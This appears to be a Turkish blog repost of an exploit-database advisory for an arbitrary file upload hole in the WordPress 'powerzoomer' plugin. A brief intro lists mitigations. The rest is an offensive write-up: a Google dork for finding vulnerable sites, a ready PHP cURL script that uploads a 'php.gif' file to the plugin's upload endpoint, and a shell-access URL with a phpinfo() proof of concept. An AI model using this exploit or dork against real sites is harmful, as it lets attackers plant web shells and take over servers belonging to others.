WordPress plugins powerzoomer Arbitrary File Upload Vulnerability

WordPress plugins powerzoomer Arbitrary File Upload Açığı bulunmuş olup diğer iki açığı bulan aynı kişi olup, bu açıktada eklenti güncellenmeli veya kod çalıştırmayı önleyeci .htaccess oluşturulmalı onuda yapamıyorsanız resim uploadını ftp den yapmalı chmod ayarlarını 755 yapmalısınız.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins - powerzoomer Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/power-zoomer/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://downloads.wordpress.org/plugin/power-zoomer.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
 
 
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/power-zoomer/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/powerzoomer/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/powerzoomer/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir